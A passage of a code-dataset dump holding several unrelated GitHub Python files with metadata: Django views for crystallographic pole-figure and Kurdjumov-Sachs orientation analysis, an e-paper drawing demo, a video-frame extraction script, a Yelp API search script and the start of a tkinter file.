request.POST.get('nd_l', 1)\n rd_h = request.POST.get('rd_h', 0)\n rd_k = request.POST.get('rd_k', -1)\n rd_l = request.POST.get('rd_l', 0)\n nd_pre = [nd_h, nd_k, nd_l]\n rd_pre = [rd_h, rd_k, rd_l]\n nd = [float(s) for s in nd_pre]\n rd = [float(s) for s in rd_pre]\n dic = {'nd_form': f1,\n 'rd_form': f2,\n 'nd': nd,\n 'rd': rd,\n }\n return render(request, 'analysis/pole_ebsd.html', dic)\n\n\ndef img_pole_ebsd(request):\n global nd\n global rd\n plt.clf()\n co_list = [[1, 0, 0], [1, 1, 0], [1, 1, 1]]\n aa, a_inverse = function_pole.crystal_matrix(nd, rd)\n co = function_pole.generate_co(co_list)\n co_norm = function_pole.co_norm(co)\n co_convert = function_pole.convert_inverse(co_norm, a_inverse)\n r_theta = function_pole.xyz2polar(co_convert)\n ax = function_pole.set_polar_axis()\n function_pole.polar_plot(r_theta, ax, \"black\")\n png = plt2png()\n plt.cla()\n response = HttpResponse(png, content_type='image/png')\n return response\n\n\ndef pole_overplot(request):\n global nd1\n global rd1\n global nd2\n global rd2\n f11 = forms.NdForm1()\n f12 = forms.RdForm1()\n f21 = forms.NdForm2()\n f22 = forms.RdForm2()\n nd_h1 = request.POST.get('nd_h1', 0)\n nd_k1 = request.POST.get('nd_k1', 0)\n nd_l1 = request.POST.get('nd_l1', 1)\n rd_h1 = request.POST.get('rd_h1', 0)\n rd_k1 = request.POST.get('rd_k1', -1)\n rd_l1 = request.POST.get('rd_l1', 0)\n nd_h2 = request.POST.get('nd_h2', 1)\n nd_k2 = request.POST.get('nd_k2', 2)\n nd_l2 = request.POST.get('nd_l2', 1)\n rd_h2 = request.POST.get('rd_h2', -1)\n rd_k2 = request.POST.get('rd_k2', 0)\n rd_l2 = request.POST.get('rd_l2', 1)\n nd_pre1 = [nd_h1, nd_k1, nd_l1]\n rd_pre1 = [rd_h1, rd_k1, rd_l1]\n nd_pre2 = [nd_h2, nd_k2, nd_l2]\n rd_pre2 = [rd_h2, rd_k2, rd_l2]\n nd1 = [float(s) for s in nd_pre1]\n rd1 = [float(s) for s in rd_pre1]\n nd2 = [float(s) for s in nd_pre2]\n rd2 = [float(s) for s in rd_pre2]\n dic = {'nd_form1': f11,\n 'rd_form1': f12,\n 'nd_form2': f21,\n 'rd_form2': f22,\n 'nd1': nd1,\n 'rd1': rd1,\n 'nd2': nd2,\n 'rd2': rd2,\n }\n return render(request, 'analysis/pole_overplot.html', dic)\n\n\ndef img_pole_overplot(request):\n global nd1\n global rd1\n global nd2\n global rd2\n plt.clf()\n co_list = [[1, 0, 0], [1, 1, 0], [1, 1, 1]]\n aa1, a_inverse1 = function_pole.crystal_matrix(nd1, rd1)\n aa2, a_inverse2 = function_pole.crystal_matrix(nd2, rd2)\n co = function_pole.generate_co(co_list)\n co_norm = function_pole.co_norm(co)\n co_convert1 = function_pole.convert_inverse(co_norm, a_inverse1)\n co_convert2 = function_pole.convert_inverse(co_norm, a_inverse2)\n r_theta1 = function_pole.xyz2polar(co_convert1)\n r_theta2 = function_pole.xyz2polar(co_convert2)\n ax = function_pole.set_polar_axis()\n function_pole.polar_plot(r_theta1, ax, \"red\")\n function_pole.polar_plot(r_theta2, ax, \"blue\")\n png = plt2png()\n plt.cla()\n response = HttpResponse(png, content_type='image/png')\n return response\n\n\ndef direction_analysis(request):\n global nd_dir\n global rd_dir\n global phi_dir\n global theta_dir\n global rot_dir\n global graph_dir\n f1_d = forms.NdForm()\n f2_d = forms.RdForm()\n f_p = forms.PhiForm()\n f_t = forms.ThetaForm()\n f_r = forms.RotationForm()\n nd_h = request.POST.get('nd_h', 0)\n nd_k = request.POST.get('nd_k', 0)\n nd_l = request.POST.get('nd_l', 1)\n rd_h = request.POST.get('rd_h', 0)\n rd_k = request.POST.get('rd_k', -1)\n rd_l = request.POST.get('rd_l', 0)\n phi = request.POST.get('phi', 45)\n theta = request.POST.get('theta', 45)\n rot = request.POST.get('rot', 90)\n graph_dir = request.POST.get('graph_type', 'pf')\n if graph_dir == 'pf':\n graph_type = 'Pole figure'\n elif graph_dir == 'ipf':\n graph_type = 'Inverse pole figure'\n else:\n graph_type = 'Pole figure'\n nd_pre = [nd_h, nd_k, nd_l]\n rd_pre = [rd_h, rd_k, rd_l]\n nd_dir = [float(s) for s in nd_pre]\n rd_dir = [float(s) for s in rd_pre]\n phi_dir = float(phi)\n theta_dir = float(theta)\n rot_dir = float(rot)\n dic = {'nd_form': f1_d,\n 'rd_form': f2_d,\n 'phi_form': f_p,\n 'theta_form': f_t,\n 'rot_form': f_r,\n 'nd': nd_dir,\n 'rd': rd_dir,\n 'phi': phi_dir,\n 'theta': theta_dir,\n 'rot': rot_dir,\n 'graph_type': graph_type,\n }\n return render(request, 'analysis/direction.html', dic)\n\n\ndef img_direction(request):\n global nd_dir\n global rd_dir\n global phi_dir\n global theta_dir\n global rot_dir\n global graph_dir\n plt.clf()\n phi_theta = [0, phi_dir, theta_dir]\n co_list = [[0, 0, 1], [0, 1, 1], [1, 1, 1], [1, 1, 2], [1, 2, 5], [1, 1, 3]]\n df_dir = pd.DataFrame(np.array([phi_theta]))\n co = function_pole.generate_co(co_list)\n co_norm = function_pole.co_norm(co)\n r_theta = function_pole.xyz2polar(co_norm)\n if graph_dir == 'pf':\n a = function_3d.crystal_matrix_rot(nd_dir, rd_dir, rot_dir)\n xyz = function_3d.phi_theta2xyz(df_dir)\n cry = function_3d.xyz2co(xyz, a)\n cry_use = function_3d.south2north(cry)\n df_polar = function_3d.convert_stereo(cry_use)\n ax = function_pole.set_polar_axis()\n function_pole.zone_ax_plot(ax)\n function_pole.polar_plot(r_theta, ax, \"black\")\n function_3d.pol_plot(df_polar, ax, \"red\")\n elif graph_dir == 'ipf':\n a = function_3d.crystal_matrix_rot(nd_dir, rd_dir, rot_dir)\n xyz = function_3d.phi_theta2xyz(df_dir)\n cry = function_3d.xyz2co(xyz, a)\n cry_use = function_3d.south2north(cry)\n cry_ipf = function_ipf.change_ipf(cry_use)\n df_polar = function_3d.convert_stereo(cry_ipf)\n frame_101 = np.zeros((0, 3))\n for i in range(-10, 10):\n for s in range(-10, 10):\n x = i\n y = s\n z = i\n part = [x, y, z]\n frame_ = np.array(part)\n frame_101 = np.vstack((frame_101, frame_))\n frame_101_k = function_ipf.change_ipf(frame_101)\n frame_bottom = np.array([[1, 0, 1]])\n frame_upper = np.array([[1, 1, 1]])\n ax = function_ipf.axis_ipf2()\n pol_101 = function_ipf.co2polar(frame_101_k)\n pol_bottom = function_ipf.co2polar(frame_bottom)\n pol_bottom.loc[\"add\"] = [0, 0, 0]\n pol_upper = function_ipf.co2polar(frame_upper)\n pol_upper.loc[\"add\"] = [0, 0, 0]\n function_ipf.polar_line(ax, pol_101)\n function_ipf.polar_line(ax, pol_bottom)\n function_ipf.polar_line(ax, pol_upper)\n function_ipf.polar_plot_k(r_theta, ax, \"black\")\n function_ipf.pol_plot(df_polar, ax, \"red\")\n png = plt2png()\n plt.cla()\n response = HttpResponse(png, content_type='image/png')\n return response\n\n\ndef plane_analysis(request):\n global nd_pla\n global rd_pla\n global rot_pla\n global graph_pla\n global df_xyz\n f1_d = forms.NdForm()\n f2_d = forms.RdForm()\n f_r = forms.RotationForm()\n nd_h = request.POST.get('nd_h', 0)\n nd_k = request.POST.get('nd_k', 0)\n nd_l = request.POST.get('nd_l', 1)\n rd_h = request.POST.get('rd_h', 0)\n rd_k = request.POST.get('rd_k', -1)\n rd_l = request.POST.get('rd_l', 0)\n rot = request.POST.get('rot', 90)\n graph_pla = request.POST.get('graph_type', 'pf')\n if graph_pla == 'pf':\n graph_type = 'Pole figure'\n elif graph_pla == 'ipf':\n graph_type = 'Inverse pole figure'\n else:\n graph_type = 'Pole figure'\n nd_pre = [nd_h, nd_k, nd_l]\n rd_pre = [rd_h, rd_k, rd_l]\n nd_pla = [float(s) for s in nd_pre]\n rd_pla = [float(s) for s in rd_pre]\n rot_pla = float(rot)\n if request.method == 'POST':\n df_xyz = None\n name = request.FILES['file'].name\n ext = os.path.splitext(name)\n if ext[1] == \".csv\":\n me = io.TextIOWrapper(request.FILES['file'].file, encoding='utf-8')\n df_xyz = pd.read_csv(me, header=None)\n else:\n pass\n else:\n name = None\n dic = {'nd_form': f1_d,\n 'rd_form': f2_d,\n 'rot_form': f_r,\n 'nd': nd_pla,\n 'rd': rd_pla,\n 'rot': rot_pla,\n 'file_name': name,\n 'graph_type': graph_type,\n }\n return render(request, 'analysis/plane.html', dic)\n\n\ndef img_plane(request):\n global nd_pla\n global rd_pla\n global rot_pla\n global graph_pla\n global df_xyz\n if df_xyz is None:\n response = HttpResponse('')\n else:\n plt.clf()\n co_list = [[0, 0, 1], [0, 1, 1], [1, 1, 1], [1, 1, 2], [1, 2, 5], [1, 1, 3]]\n co = function_pole.generate_co(co_list)\n co_norm = function_pole.co_norm(co)\n r_theta = function_pole.xyz2polar(co_norm)\n if graph_pla == 'pf':\n a = function_3d.crystal_matrix_rot(nd_pla, rd_pla, rot_pla)\n xyz = np.array(df_xyz)\n cry = function_3d.xyz2co(xyz, a)\n cry_use = function_3d.south2north(cry)\n df_polar = function_3d.convert_stereo(cry_use)\n df_r_theta = df_polar.drop(\"theta_rad\", axis=1)\n df_hist = function_3d.create_hist(df_r_theta)\n ax = function_pole.set_polar_axis()\n function_3d.plot_hist(df_hist, ax)\n function_pole.zone_ax_plot(ax)\n function_pole.polar_plot(r_theta, ax, \"black\")\n elif graph_pla == 'ipf':\n frame_101 = np.zeros((0, 3))\n for i in range(-15, 15):\n for s in range(-15, 15):\n x = i\n y = s\n z = i\n part = [x, y, z]\n frame_ = np.array(part)\n frame_101 = np.vstack((frame_101, frame_))\n frame_bottom = np.array([[1, 0, 1]])\n frame_upper = np.array([[1, 1, 1]])\n a = function_3d.crystal_matrix_rot(nd_pla, rd_pla, rot_pla)\n xyz = np.array(df_xyz)\n cry = function_3d.xyz2co(xyz, a)\n cry_use = function_3d.south2north(cry)\n cry_ipf = function_ipf.change_ipf(cry_use)\n df_polar = function_3d.convert_stereo(cry_ipf)\n df_r_theta = df_polar.drop(\"theta_rad\", axis=1)\n df_hist = function_3d.create_hist(df_r_theta)\n ax = function_ipf.axis_ipf()\n pol_101 = function_ipf.co2polar(frame_101)\n pol_bottom = function_ipf.co2polar(frame_bottom)\n pol_bottom.loc[\"add\"] = [0, 0, 0]\n pol_upper = function_ipf.co2polar(frame_upper)\n pol_upper.loc[\"add\"] = [0, 0, 0]\n function_ipf.polar_line(ax, pol_101)\n function_ipf.polar_line(ax, pol_bottom)\n function_ipf.polar_line(ax, pol_upper)\n co = function_pole.generate_co(co_list)\n co_norm = function_pole.co_norm(co)\n r_theta = function_pole.xyz2polar(co_norm)\n xx = np.ones(len(pol_101))\n yy = pd.DataFrame(xx.T)\n zz = pol_101.join(yy)\n function_ipf.plot_hist_k(df_hist, ax)\n function_ipf.polar_plot_k(r_theta, ax, \"black\")\n ax.fill_between(zz.iloc[:, 2], zz.iloc[:, 0], zz.iloc[:, 3], facecolors=\"white\")\n png = plt2png()\n plt.cla()\n response = HttpResponse(png, content_type='image/png')\n return response\n\n\ndef ks_one(request):\n f11 = forms.NdForm1()\n f12 = forms.RdForm1()\n f21 = forms.NdForm2()\n f22 = forms.RdForm2()\n p1 = forms.PlaneForm1()\n p2 = forms.PlaneForm2()\n d1 = forms.DirectionForm1()\n d2 = forms.DirectionForm2()\n nd_h1 = request.POST.get('nd_h1', -2)\n nd_k1 = request.POST.get('nd_k1', 1)\n nd_l1 = request.POST.get('nd_l1', 2)\n rd_h1 = request.POST.get('rd_h1', 1.5)\n rd_k1 = request.POST.get('rd_k1', -1)\n rd_l1 = request.POST.get('rd_l1', 0)\n nd_h2 = request.POST.get('nd_h2', 1.5)\n nd_k2 = request.POST.get('nd_k2', 0)\n nd_l2 = request.POST.get('nd_l2', 1)\n rd_h2 = request.POST.get('rd_h2', 1)\n rd_k2 = request.POST.get('rd_k2', 1)\n rd_l2 = request.POST.get('rd_l2', -1)\n p1_h = request.POST.get('p1_h', -1)\n p1_k = request.POST.get('p1_k', -1)\n p1_l = request.POST.get('p1_l', 1)\n p2_h = request.POST.get('p2_h', 1)\n p2_k = request.POST.get('p2_k', -1)\n p2_l = request.POST.get('p2_l', 0)\n d1_h = request.POST.get('d1_h', -1)\n d1_k = request.POST.get('d1_k', 1)\n d1_l = request.POST.get('d1_l', 0)\n d2_h = request.POST.get('d2_h', -1)\n d2_k = request.POST.get('d2_k', -1)\n d2_l = request.POST.get('d2_l', 1)\n nd_pre1 = [nd_h1, nd_k1, nd_l1]\n rd_pre1 = [rd_h1, rd_k1, rd_l1]\n nd_pre2 = [nd_h2, nd_k2, nd_l2]\n rd_pre2 = [rd_h2, rd_k2, rd_l2]\n p1_pre = [p1_h, p1_k, p1_l]\n p2_pre = [p2_h, p2_k, p2_l]\n d1_pre = [d1_h, d1_k, d1_l]\n d2_pre = [d2_h, d2_k, d2_l]\n nd_fcc = [float(s) for s in nd_pre1]\n rd_fcc = [float(s) for s in rd_pre1]\n nd_bcc = [float(s) for s in nd_pre2]\n rd_bcc = [float(s) for s in rd_pre2]\n p_fcc = [float(s) for s in p1_pre]\n p_bcc = [float(s) for s in p2_pre]\n d_fcc = [float(s) for s in d1_pre]\n d_bcc = [float(s) for s in d2_pre]\n x_ = p_fcc / np.linalg.norm(p_fcc)\n y_ = p_bcc / np.linalg.norm(p_bcc)\n xx_ = d_fcc / np.linalg.norm(d_fcc)\n yy_ = d_bcc / np.linalg.norm(d_bcc)\n comb_list = p_fcc + d_fcc + p_bcc + d_bcc\n norm_list = list(x_) + list(xx_) + list(y_) + list(yy_)\n comb_array = np.array([comb_list])\n norm_array = np.array([norm_list])\n result = function_ks.calc_ks(nd_fcc, rd_fcc, nd_bcc, rd_bcc, comb_array, norm_array)\n dic = {'nd_form1': f11,\n 'rd_form1': f12,\n 'nd_form2': f21,\n 'rd_form2': f22,\n 'p1_form': p1,\n 'p2_form': p2,\n 'd1_form': d1,\n 'd2_form': d2,\n 'nd_fcc': nd_fcc,\n 'rd_fcc': rd_fcc,\n 'nd_bcc': nd_bcc,\n 'rd_bcc': rd_bcc,\n 'p_fcc': p_fcc,\n 'p_bcc': p_bcc,\n 'd_fcc': d_fcc,\n 'd_bcc': d_bcc,\n 'plane': round(result[4], 2),\n 'direction': round(result[5], 2),\n 'ks': round(result[6], 2),\n }\n return render(request, 'analysis/ks_one.html', dic)\n\n\ndef ks_all(request):\n f11 = forms.NdForm1()\n f12 = forms.RdForm1()\n f21 = forms.NdForm2()\n f22 = forms.RdForm2()\n nd_h1 = request.POST.get('nd_h1', -2)\n nd_k1 = request.POST.get('nd_k1', 1)\n nd_l1 = request.POST.get('nd_l1', 2)\n rd_h1 = request.POST.get('rd_h1', 1.5)\n rd_k1 = request.POST.get('rd_k1', -1)\n rd_l1 = request.POST.get('rd_l1', 0)\n nd_h2 = request.POST.get('nd_h2', 1.5)\n nd_k2 = request.POST.get('nd_k2', 0)\n nd_l2 = request.POST.get('nd_l2', 1)\n rd_h2 = request.POST.get('rd_h2', 1)\n rd_k2 = request.POST.get('rd_k2', 1)\n rd_l2 = request.POST.get('rd_l2', -1)\n nd_pre1 = [nd_h1, nd_k1, nd_l1]\n rd_pre1 = [rd_h1, rd_k1, rd_l1]\n nd_pre2 = [nd_h2, nd_k2, nd_l2]\n rd_pre2 = [rd_h2, rd_k2, rd_l2]\n nd_fcc = [float(s) for s in nd_pre1]\n rd_fcc = [float(s) for s in rd_pre1]\n nd_bcc = [float(s) for s in nd_pre2]\n rd_bcc = [float(s) for s in rd_pre2]\n # ===============================================================================\n # preparation of possible combination of plane and direction\n # K-S OR\n # (111)fcc//(011)bcc\n # [0-11]fcc//[1-11]bcc\n # ===============================================================================\n x1 = [[1, 1, 1], [-1, -1, -1]]\n y1 = [[0, 1, -1], [0, -1, 1], [1, 0, -1], [-1, 0, 1], [1, -1, 0], [-1, 1, 0]]\n x2 = [[1, -1, 1], [-1, 1, -1]]\n y2 = [[0, 1, 1], [0, -1, -1], [1, 0, -1], [-1, 0, 1], [1, 1, 0], [-1, -1, 0]]\n x3 = [[1, 1, -1], [-1, -1, 1]]\n y3 = [[0, 1, 1], [0, -1, -1], [1, 0, 1], [-1, 0, -1], [1, -1, 0], [-1, 1, 0]]\n x4 = [[-1, 1, 1], [1, -1, -1]]\n y4 = [[0, 1, -1], [0, -1, 1], [1, 0, 1], [-1, 0, -1], [1, 1, 0], [-1, -1, 0]]\n\n a1 = [[0, 1, 1], [0, -1, -1]]\n b1 = [[1, 1, -1], [-1, 1, -1], [1, -1, 1], [-1, -1, 1]]\n a2 = [[1, 0, 1], [-1, 0, -1]]\n b2 = [[1, 1, -1], [1, -1, -1], [-1, 1, 1], [-1, -1, 1]]\n a3 = [[1, 1, 0], [-1, -1, 0]]\n b3 = [[1, -1, 1], [1, -1, -1], [-1, 1, 1], [-1, 1, -1]]\n a4 = [[0, 1, -1], [0, -1, 1]]\n b4 = [[1, 1, 1], [-1, 1, 1], [1, -1, -1], [-1, -1, -1]]\n a5 = [[1, 0, -1], [-1, 0, 1]]\n b5 = [[1, 1, 1], [1, -1, 1], [-1, 1, -1], [-1, -1, -1]]\n a6 = [[1, -1, 0], [-1, 1, 0]]\n b6 = [[1, 1, 1], [1, 1, -1], [-1, -1, 1], [-1, -1, -1]]\n fcc_comb = []\n fcc_norm = []\n for s, t in zip([x1, x2, x3, x4], [y1, y2, y3, y4]):\n for v, w in itertools.product(s, t):\n z = list(v) + list(w)\n zz = list(list(v) / np.linalg.norm(list(v))) + list(list(w) / np.linalg.norm(list(w)))\n fcc_comb.append(z)\n fcc_norm.append(zz)\n bcc_comb = []\n bcc_norm = []\n for s, t in zip([a1, a2, a3, a4, a5, a6], [b1, b2, b3, b4, b5, b6]):\n for v, w in itertools.product(s, t):\n z = list(v) + list(w)\n zz = list(list(v) / np.linalg.norm(list(v))) + list(list(w) / np.linalg.norm(list(w)))\n bcc_comb.append(z)\n bcc_norm.append(zz)\n total_comb = []\n for v, w in itertools.product(fcc_comb, bcc_comb):\n z = list(v) + list(w)\n total_comb.append(z)\n comb_array = np.array(total_comb)\n norm_comb = []\n for v, w in itertools.product(fcc_norm, bcc_norm):\n z = list(v) + list(w)\n norm_comb.append(z)\n norm_array = np.array(norm_comb)\n result = function_ks.calc_ks(nd_fcc, rd_fcc, nd_bcc, rd_bcc, comb_array, norm_array)\n dic = {'nd_form1': f11,\n 'rd_form1': f12,\n 'nd_form2': f21,\n 'rd_form2': f22,\n 'nd_fcc': nd_fcc,\n 'rd_fcc': rd_fcc,\n 'nd_bcc': nd_bcc,\n 'rd_bcc': rd_bcc,\n 'p_fcc': result[0],\n 'p_bcc': result[2],\n 'd_fcc': result[1],\n 'd_bcc': result[3],\n 'plane': round(result[4], 2),\n 'direction': round(result[5], 2),\n 'ks': round(result[6], 2),\n }\n return render(request, 'analysis/ks_all.html', dic)\n", "repo_name": "yuta1023/analysis_app", "sub_path": "analysis/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 19368, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "matplotlib.use", "line_number": 10, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 87, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 152, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 247, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 248, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 261, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 261, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 262, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 297, "usage_type": "call"}, {"api_name": "os.path", "line_number": 297, "usage_type": "attribute"}, {"api_name": "io.TextIOWrapper", "line_number": 299, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 300, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 314, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 324, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 326, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 326, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 353, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 354, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 375, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 376, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 382, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 382, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 383, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 436, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 437, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 437, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 438, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 438, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 439, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 439, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 442, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 443, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 465, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 523, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 525, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 525, "usage_type": "attribute"}, {"api_name": "itertools.product", "line_number": 531, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 533, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 533, "usage_type": "attribute"}, {"api_name": "itertools.product", "line_number": 537, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 540, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 542, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 545, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 563, "usage_type": "call"}]} +{"seq_id": "4944138915", "text": "import sys\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom EPD import EPD\n\nWHITE = 1\nBLACK = 0\n\ndef main(argv):\n \"\"\"main program - draw and display a test image\"\"\"\n\n epd = EPD()\n\n print('panel = {p:s} {w:d} x {h:d} version={v:s} COG={g:d} FILM={f:d}'.format(p=epd.panel, w=epd.width, h=epd.height, v=epd.version, g=epd.cog, f=epd.film))\n\n epd.clear()\n\n demo(epd)\n\n\ndef demo(epd):\n \"\"\"simple drawing demo - black drawing on white background\"\"\"\n\n # initially set all white background\n image = Image.new('1', epd.size, WHITE)\n\n # prepare for drawing\n draw = ImageDraw.Draw(image)\n\n # three pixels in top left corner\n draw.point((0, 0), fill=BLACK)\n draw.point((1, 0), fill=BLACK)\n draw.point((0, 1), fill=BLACK)\n\n # lines\n draw.line([(10,20),(100,20)], fill=BLACK)\n draw.line([(10,90),(100,60)], fill=BLACK)\n\n # filled circle, elipse\n draw.ellipse((120, 10, 150, 40), fill=BLACK, outline=BLACK)\n draw.ellipse((120, 60, 170, 90), fill=WHITE, outline=BLACK)\n\n # text\n draw.text((30, 30), 'hello world', fill=BLACK)\n\n # display image on the panel\n epd.display(image)\n epd.update()\n\n\n# main\nif \"__main__\" == __name__:\n if len(sys.argv) < 1:\n sys.exit('usage: {p:s}'.format(p=sys.argv[0]))\n main(sys.argv[1:])\n", "repo_name": "repaper/gratis", "sub_path": "PlatformWithOS/demo/DrawDemo.py", "file_name": "DrawDemo.py", "file_ext": "py", "file_size_in_byte": 1296, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 239, "dataset": "github-code", "pt": "86", "api": [{"api_name": "EPD.EPD", "line_number": 12, "usage_type": "call"}, {"api_name": "PIL.Image.new", "line_number": 25, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 25, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 28, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 28, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 53, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 54, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 54, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 55, "usage_type": "attribute"}]} +{"seq_id": "25814224252", "text": "import cv2\nimport os\n\ndef video2imgs(videoPath, imgPath):\n if not os.path.exists(imgPath):\n os.makedirs(imgPath) # 目标文件夹不存在,则创建\n cap = cv2.VideoCapture(videoPath) # 获取视频\n judge = cap.isOpened() # 判断是否能打开成功\n print(judge)\n fps = cap.get(cv2.CAP_PROP_FPS) # 帧率,视频每秒展示多少张图片\n print('fps:',fps)\n\n frames = 1 # 用于统计所有帧数\n count = 1 # 用于统计保存的图片数量\n\n while(judge):\n flag, frame = cap.read() # 读取每一张图片 flag表示是否读取成功,frame是图片\n if not flag:\n print(flag)\n print(\"Process finished!\")\n break\n else:\n if frames % 10 == 0: # 每隔10帧抽一张\n imgname = str(count).rjust(3,'0') + \".jpg\"\n newPath = imgPath + imgname\n print(imgname)\n cv2.imwrite(newPath, frame, [cv2.IMWRITE_JPEG_QUALITY, 100])\n count += 1\n frames += 1\n cap.release()\n print(\"共有 %d 张图片\"%(count-1))\nif __name__ == '__main__':\n video_path = '/Users/huangqiming/Desktop/视神经鞘/optic-nerve-sheath/data/ONSD2/°üÁúÃù/SMP20211020171908/202110201726170031SMP.avi'\n save_path = '/Users/huangqiming/Desktop/视神经鞘/optic-nerve-sheath/data/new/'\n video2imgs(video_path, save_path)", "repo_name": "Duan-Samantha/ONSD", "sub_path": "ONSD/preprocessing/video2images.py", "file_name": "video2images.py", "file_ext": "py", "file_size_in_byte": 1500, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "os.path.exists", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FPS", "line_number": 10, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.IMWRITE_JPEG_QUALITY", "line_number": 27, "usage_type": "attribute"}]} +{"seq_id": "38986713090", "text": "import requests\nfrom config import api_key\n\nurl = \"https://api.yelp.com/v3/businesses/search\"\n\nheaders = {\n \"Authorization\": \"Bearer \" + api_key\n}\n\nparams = {\n \"term\": \"Barbers\",\n \"location\": \"NYC\"\n}\n\nresponse = requests.get(url, headers=headers, params=params)\n\nbusinesses = response.json()[\"businesses\"]\n\nfor business in businesses:\n print(business[\"name\"])\n", "repo_name": "eglootz/pydev", "sub_path": "codewithmosh/pyyelp/pyyelp.py", "file_name": "pyyelp.py", "file_ext": "py", "file_size_in_byte": 372, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "config.api_key", "line_number": 7, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "38233577712", "text": "import tkinter as tk\nfrom tkinter.ttk import Style\nfrom tkinter import font\nfrom PIL import Image, ImageTk\n\n\"\"\"\nCENTER DIFFERENT WINDOWS IN TKINTER APP 